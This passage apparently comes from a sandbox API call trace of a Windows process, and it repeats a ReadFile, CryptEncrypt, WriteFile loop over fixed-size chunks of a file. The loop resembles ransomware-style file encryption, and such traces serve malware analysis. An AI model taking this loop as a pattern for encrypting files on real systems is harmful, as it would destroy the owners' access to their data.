lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.123] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.123] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.123] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.123] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.124] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.124] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.124] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.124] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.124] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.124] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.125] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.125] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.125] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.125] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.125] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.125] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.126] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.126] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.126] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.126] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.126] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.127] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.127] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.127] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.127] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.127] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.128] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.128] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.128] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.128] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.128] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.128] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.129] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.129] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.129] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.129] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.129] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.130] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.130] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.130] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.130] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.130] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) 